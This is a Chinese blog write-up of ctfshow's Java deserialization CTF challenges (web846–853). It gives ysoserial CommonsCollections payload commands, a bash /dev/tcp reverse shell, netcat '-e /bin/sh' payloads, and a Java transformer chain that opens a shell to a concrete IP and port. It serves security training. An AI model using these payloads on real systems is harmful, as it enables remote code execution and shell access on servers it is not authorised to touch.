CTFSHOW web入门 java反序列化篇(更新中)

原创 已于 2023-02-09 17:02:21 修改 · 置顶 · 6.5k 阅读 · 35 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #前端 #开发语言

于 2022-12-07 15:59:42 首次发布
本文详细介绍Java反序列化漏洞的原理与利用方法,通过实际案例演示如何构造payload进行攻击,涉及工具使用及多种场景下的具体操作。

文章目录


在做这部分题前,推荐大家先去学习下java反序列化,尤其是CC链
可以看下两个系列视频,收获颇多
https://space.bilibili.com/2142877265/channel/collectiondetail?sid=29805&ctype=0

https://www.bilibili.com/video/BV16h411z7o9/?spm_id_from=333.999.0.0&vd_source=23c2bbe4623ae526416ea7a1ec4679fc
从这部分开始看即可
在这里插入图片描述
下面大部分题目需要用到ysoserial工具。
工具下载地址链接: https://pan.baidu.com/s/1Sx61GihwHtDsaDXbL7Q7uQ?pwd=jt5w
也可下载源码自行构建
https://github.com/frohoff/ysoserial

记得base64编码后的payload再url编码一次

web846

URLDNS链
java -jar ysoserial.jar URLDNS "题目地址"|base64

web847

在ysoserial中cc1、cc3、cc5、cc6、cc7对应的commons-collections:3.1
cc2、cc4对应的commons-collections4:4.0
所以在3.1中随便挑一个运行反弹shell即可。
payload

java -jar ysoserial.jar CommonsCollections1 "bash -c {echo,要执行命令的base64编码}|{base64,-d}|{bash,-i}"|base64

这里使用bash反弹
bash -i >& /dev/tcp/x.x.x.x/xxxx 0>&1

web848

题目中提示不准用TransformedMap类反序列化
导致cc1无法使用更换其他的即可。
payload

java -jar ysoserial.jar CommonsCollections3 "bash -c {echo,要执行命令的base64编码}|{base64,-d}|{bash,-i}"|base64

web849

首先只能使用cc2或者cc4,并且题目提示需要nc反弹。
那么把命令改成nc ip port -e /bin/sh
payload

java -jar ysoserial.jar CommonsCollections2 "nc ip port -e /bin/sh "|base64

web850

cc3可用

java -jar ysoserial.jar CommonsCollections3  "bash -c {echo,要执行命令的base64编码}|{base64,-d}|{bash,-i}"|base64

web851-web853

直接用工具打不通了,这里采用的方法是基于cc7改的,改成了适用于commons-collections4的链子

        Transformer[] transformers = new Transformer[]{
   
   
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{
   
   String.class, Class[].class}, new Object[]{
   
   "getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{
   
   Object.class, Object[].class}, new Object[]{
   
   null, null}),
                new InvokerTransformer("exec", new Class[]{
   
   String.class}, new Object[]{
   
   "nc 1.15.153.196 4567 -e /bin/sh"})
        };
        Transformer transformerChain2 = new ChainedTransformer(transformers);
最低0.47元/天 解锁文章
CTFSHOW web入门 java反序列化 web855
羽的博客
12-13 2588
ctfshow java反序列化
CTF:记一次简单的Java反序列化题目
weixin_44770698的博客
11-20 1465
CTF:记一次简单的Java反序列化题目
CtfshowJava反序列化
weixin_56537388的博客
08-15 723
发现进入URLsteamhander,他的hashcode使用了getAddress,我们最终要做的就是调用getaddress,获取DNS解析。调用hashmap最后调用的是url的hashcode方法,在最后调用getaddress。重写是子类对父类可以访问方法的重新编写,返回值和形参都不能改变,可以看到,put的时候调用了hashcode,不是-1了。,子类对象赋值给父类使用,但是不能访问在子类特有的方法。这里的初始值是-1,只有为-1才能传数据。ysoserial工具。这里使用了重写的概念。
CTF—Java 反编译&XXE&反序列化
qi_SJQ_的博客
03-02 6274
1.Java 常考点及出题思路: 考点技术:xxe,spel 表达式,反序列化,文件安全,最新框架插件漏洞等。 一般都会设法间接给出源码或相关配置提示文件,间接性源码或直接源码体现等形式,否则单纯黑盒难度比较大。 ctf web信息泄露总结: 参考:https://www.cnblogs.com/xishaonian/p/7628153.html 00x1 .ng 源码泄露 00x2 git 源码泄露 00x3 .DS_Store 文件泄漏 00x4 网站备份压缩文件 00x5 SVN 导致文件泄露 00.
从CTF学习Java反序列化
why811的博客
08-18 1742
我们可以看到cookie里面返回了Java序列化内容,带着cookie访问返回了hello {{username}}的字符,说明我们传入的cookie被反序列化了。其实看到LogHandler不能反序列化的时候,直接一口否定了他的可利用性,并没有去尝试,那么为什么不实际尝试一下呢?其实再仔细一点,可以发现这个类继承了HashSet,HashSet实现了Serializable接口,貌似可以搞事。(但是打final的时候是没有公网的,附件只有源码,需要去靶机上面把本地repo拖下来。
java反序列化漏洞在CTF中的利用
m0_64893612的博客
03-01 1962
序列化指的是将对象或数据结构转换为可存储或传输的格式的过程,实现的方法是;反序列化则反之,实现的方法是,可以简单地理解为将文件压缩和解压缩的过程。与PHP中反序列互相触发魔法函数导致的漏洞成因不同,java反序列化漏洞的成因主要是由于java序列化和反序列化机制的设计特点所致,简单地讲,只要反序列化代码中含有危险的命令代码,且该代码的参数是可控的,那它就存在该漏洞。漏洞原理在我今天这里不是重要的,我主要想记录的是该漏洞的利用方式。通常在解题中如果你看到一段字符串以rO0AB。
CTFshow-WEB入门-反序列化
feng的博客
02-14 6184
前言 简单的反序列化直接给出payload,有意思的,较为复杂的和我不太会的会分析一波。 web254 ?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } echo urlencode(serialize(new ctfShowUser())
CTFSHOWweb入门反序列化
7ruth0hn的博客
07-25 3864
web254 include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this
ctfshow web入门反序列化 web254-257
m0_62207170的博客
04-21 738
ctfshow web入门反序列化 web254-257
ctfshow刷题(Java反序列化)
网安菜鸡学习笔记
07-06 523
CTFshowJava反序列化 web846 urldns链 import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.ObjectOutput; import java.io.ObjectOutputStream; import java.lang.reflect.Field...
java反序列化利用工具
07-06
java反序列化 weblogic反序列化
CTF之think_java反序列化完整案例
qq_36585338的博客
11-30 1284
【代码】CTF之think_java反序列化完整案例。
ctfshow-java反序列化专题:持续更新...
最新发布
Rsecret2的博客
04-21 751
web846-web858
【CTF】java反序列-2020-网鼎杯-朱雀组-Web-think_java
(∪.∪ )...zzz的博客
06-13 3829
看目录!读代码如何寻找突破口?存在sql注入抓包 注入语句写在数据包里swagger开发接口login输入用户名密码得到返回数据包user current 读代码 如何寻找突破口? 存在sql注入 抓包 注入语句写在数据包里 (这个包抓错了,所以没有显示密码) /common/test/sqlDict dbName=myapp?a=’ union select (select pwd from user)# “tableDescribe”:“ctfhub_8978
【网络安全渗透测试零基础入门必知必会】之CTF题目解析Java代码审计中的反序列化漏洞,以及其他漏洞的组合利用5
Libra1313的博客
07-24 1492
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段反序列化渗透与防御第5。本文主要讲解java反序列化漏洞比赛题目解析本文基于一次内部小范围比赛题目的复现,简单聊聊Java代码审计中的反序列化漏洞。近年来,工作中Java Web的项目越来越常见,并且逐渐取代了前几年php的辉煌地位。在众多Java WebShiroFastjsonJBossWebLogicStructs2等等。本文基于一次内部小范围比赛题目的复现,简单聊聊Java代码审计中的反序列化漏洞,以及其他漏洞的组合利用。
Ctfshow 反序列化
qq_74806534的博客
03-17 1953
SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。SSTI就是服务器端模板注入SSTI也是,其成因其实是可以类比于sql注入的。sql注入是从用户获得一个输入,然后后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。SSTI也是获取了一个输入,然后在后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,
ctfshowJAVA
njh18790816639的博客
04-16 5686
web279~279 这里便是跑脚本的事了! python Struts2Scan.py -u http://892a1226-9adc-4c5b-a700-c1ba9ca6ee26.challenge.ctf.show:8080/login.action 然后进行利用 python Struts2Scan.py -u http://892a1226-9adc-4c5b-a700-c1ba9ca6ee26.challenge.ctf.show:8080/login.action -n S2-009 --e
ctfshow反序列化
2301_80217595的博客
03-24 1111
首先访问index.php,然后改cookie,再刷新一次index.php,再访问一次check.php,这样马就写好了,然后链接蚁剑即可得到。__destruct():析构函数,在对象的所有引用都被删除时或者对象被显式销毁时调用,当对象被销毁时自动调用。
ctf-web: 简单java反序列化示例
weixin_59166557的博客
03-16 1140
Java 中,序列化(Serialization)是指将对象的状态转换为字节流的过程,反序列化(Deserialization)则是指将字节流转换回对象的过程。方法,Java 将使用默认的反序列化机制。是一个私有方法,通常在类的内部实现,用于自定义反序列化的过程。例如,可以在读取对象的字段之前或之后执行额外的逻辑。类的一部分,用于从流中读取对象的状态并重构对象。是 Java 中用于反序列化对象的方法。类实现了序列化和反序列化的自定义逻辑。如果需要自定义反序列化过程,可以在类中定义。
Java反序列化工具:Jboss、Weblogic、Websphere漏洞修复
Java编程中,序列化是指将对象状态转换为可保存或传输的格式的过程,反之,反序列化则是将这些格式重新转化为对象。这一过程在数据持久化、数据交换和远程方法调用等方面有着广泛的应用。 描述部分提到的“覆盖...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值